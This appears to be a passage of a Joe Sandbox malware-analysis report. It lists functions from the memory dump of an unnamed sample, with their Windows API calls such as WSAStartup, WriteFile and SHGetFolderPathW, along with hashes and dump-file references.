                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                                          • Instruction ID: 0c6644fc95de5a6b21d2082465916ece4f0d915df15ccacddb8ac9e5105455f5
                                                                                                                                                          • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                                          • Instruction Fuzzy Hash: 4501D671504601EBCB25BF29E841E5BBBB8AFA1360F60453EF85887251DB31A866C7A1
                                                                                                                                                          Function 00125116 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00125A39,?,?,?,-00000003,00000000,00000000), ref: 0012514E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3964851224-0
                                                                                                                                                          • Opcode ID: ccd881639999cb71d60d92a3b1b37718257a9714b2f94e3290bd0791b22b0fa5
                                                                                                                                                          • Instruction ID: 24e81d74a66542a2fb8cf1addaff98f8fff30de8bb5e8a72c267b0ee60c280ec
                                                                                                                                                          • Opcode Fuzzy Hash: ccd881639999cb71d60d92a3b1b37718257a9714b2f94e3290bd0791b22b0fa5
                                                                                                                                                          • Instruction Fuzzy Hash: 53F0F079200E31AFC7299F15E840B2AFBA6FF50F60F00822AE54946A50CB70D830CBD4
                                                                                                                                                          Function 001795AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 001795C9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Startup
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 724789610-0
                                                                                                                                                          • Opcode ID: aa1ed3036c55d2289efb4fc2941190d10357ded2c3c5693ced27390027b60669
                                                                                                                                                          • Instruction ID: c4731415f49d197bf37fd2d7b224991c9823482ee79b11bb23342efa87489733
                                                                                                                                                          • Opcode Fuzzy Hash: aa1ed3036c55d2289efb4fc2941190d10357ded2c3c5693ced27390027b60669
                                                                                                                                                          • Instruction Fuzzy Hash: DCE0E5336043146BC310EA64EC05AABB799BF85720F04871ABDA4872C1DB30D814C3C1
                                                                                                                                                          Function 00123E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,001234E2,?,00000001), ref: 00123E6D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                          • Opcode ID: ad8b36a90c1b56d7d8154158506f3bd975d15dd7d426aef68f85200c7c18c7e7
                                                                                                                                                          • Instruction ID: 9ba63d0a10d098ed78719e84f30982a26508989ef1603c6f6ed4171a869a2f3c
                                                                                                                                                          • Opcode Fuzzy Hash: ad8b36a90c1b56d7d8154158506f3bd975d15dd7d426aef68f85200c7c18c7e7
                                                                                                                                                          • Instruction Fuzzy Hash: C9F03971101761CFCB389F64F490816BBF0EF147153268A3EE1E682A21D7359998DF00
                                                                                                                                                          Function 001679F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00167A11
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FolderPath_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3334745507-0
                                                                                                                                                          • Opcode ID: 3ee0fb3cdbe95a278269b4cbd41aea159fd2b4f831d8713cc621bb7894356947
                                                                                                                                                          • Instruction ID: 395666f59b270a0b6d21bf3d1baeccf8a638b7b02a2ec99e08e1c25c2dc4e4ed
                                                                                                                                                          • Opcode Fuzzy Hash: 3ee0fb3cdbe95a278269b4cbd41aea159fd2b4f831d8713cc621bb7894356947
                                                                                                                                                          • Instruction Fuzzy Hash: 64D05EA65002282FDB50E634AC0ADFB36ADC744104F0002A0786DD2042EA20AE8586F0
                                                                                                                                                          Function 00166852 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00166623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,0016685E,?,?,?,00194A5C,001BE448,00000003,?,?), ref: 001666E2
                                                                                                                                                          • WriteFile.KERNEL32(?,?,001E22E8,00000000,00000000,?,?,?,00194A5C,001BE448,00000003,?,?,00124C44,?,?), ref: 0016686C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$PointerWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 539440098-0
                                                                                                                                                          • Opcode ID: ac80d351a51ece5858a638ad1ff1676339e944ea0930fdee76fbc98e33a7ec29
                                                                                                                                                          • Instruction ID: b9df1b6a51421ba8ed6eab1082e9aad81961c1d626f375f63595d3f10217fdfd
                                                                                                                                                          • Opcode Fuzzy Hash: ac80d351a51ece5858a638ad1ff1676339e944ea0930fdee76fbc98e33a7ec29
                                                                                                                                                          • Instruction Fuzzy Hash: 3CE04636000208BBDB20AF94EC01A8ABBBCEB04310F00451AF94191010D7B1AE149BA0
                                                                                                                                                          Function 0012193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00121952
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSendTimeout
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1599653421-0
                                                                                                                                                          • Opcode ID: c7d65c12d923912e425a4d4d8a805bc804d76a2944e752c8d17f059e3f5a622c
                                                                                                                                                          • Instruction ID: c6608953443ffcd5c6db9d43c4294815e2138e9551025470bb6074f2720c958e
                                                                                                                                                          • Opcode Fuzzy Hash: c7d65c12d923912e425a4d4d8a805bc804d76a2944e752c8d17f059e3f5a622c
                                                                                                                                                          • Instruction Fuzzy Hash: 81D012F16902087EFB008771DD07DBB775CD722F81F4046617E06D68D1D6649E498570
                                                                                                                                                          Function 0015E390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00121952
                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0015E3AA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1777923405-0
                                                                                                                                                          • Opcode ID: 60d8ab10dd3fd7200de6027cb3afc8d5c05aac2d610a28ed8aa1bf6d61e229b7
                                                                                                                                                          • Instruction ID: 1d9f92526048315aaee36b7b12f60faa4aed46850feb6dadf671423b24b237bb
                                                                                                                                                          • Opcode Fuzzy Hash: 60d8ab10dd3fd7200de6027cb3afc8d5c05aac2d610a28ed8aa1bf6d61e229b7
                                                                                                                                                          • Instruction Fuzzy Hash: 73D01231544120EAFE746F14FC06FC177929B41751F110459B5816B0E5C7D25CD15540
                                                                                                                                                          Function 00176FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 530164218-0
                                                                                                                                                          • Opcode ID: eedbf4563b9f00b966d6d70076f3d3923b74cbb4d5db5011da83fc9069d61c1f
                                                                                                                                                          • Instruction ID: 6b61a3c38ac5d181db84b49979c35d436bf82d1998ce9e7ddc4aa23fb021c0a3
                                                                                                                                                          • Opcode Fuzzy Hash: eedbf4563b9f00b966d6d70076f3d3923b74cbb4d5db5011da83fc9069d61c1f
                                                                                                                                                          • Instruction Fuzzy Hash: 1FD067362105549F8B01EB99E844C89B7E9EB5D6103018051F50A9B631D621E8909B90
                                                                                                                                                          Function 00124FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,001949DA,?,?,00000000), ref: 00124FC4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                          • Opcode ID: 461b8defbb10809f5d02ecee7954c7a8734457bab5bc9ec104fffb73424f71d8
                                                                                                                                                          • Instruction ID: f79758d7f692581286948a448a920136d5320afd3f792858a8552f5f889059e9
                                                                                                                                                          • Opcode Fuzzy Hash: 461b8defbb10809f5d02ecee7954c7a8734457bab5bc9ec104fffb73424f71d8
                                                                                                                                                          • Instruction Fuzzy Hash: 88D0C974640208BFEB00CB90DC46FAA7BBCEB05718F200194F601A66D0D2F2BE808B55
                                                                                                                                                          Function 00194DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                          • Opcode ID: eb13b63b929953349851953f805f3bcb511e82f90f1e9a221286d74efad1ffdf
                                                                                                                                                          • Instruction ID: 77059d935c95abe8046dab8aad0fe9d5dcbca9827ffedea1302a15511b827cde
                                                                                                                                                          • Opcode Fuzzy Hash: eb13b63b929953349851953f805f3bcb511e82f90f1e9a221286d74efad1ffdf
                                                                                                                                                          • Instruction Fuzzy Hash: 61D0C9B15002009BE7209F69E80478ABBE4AF55300F248829E5E682961D776E8C29B11
                                                                                                                                                          Function 001250EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00195950), ref: 0012510C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: f33b2b12362b6aee89d5e8d44253769a8760ad63150af79eaca28de459a728a0
                                                                                                                                                          • Instruction ID: 91b4d48a7c98f9ef385b3727cc97eaaa66abfa2bedd740b06890055f5f4f0644
                                                                                                                                                          • Opcode Fuzzy Hash: f33b2b12362b6aee89d5e8d44253769a8760ad63150af79eaca28de459a728a0
                                                                                                                                                          • Instruction Fuzzy Hash: 48E0B675500B12CBC3354F1AE844412FBF6FFE13613218A2FD4E682A60DBB05896DB90

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0018A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0018AFDB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
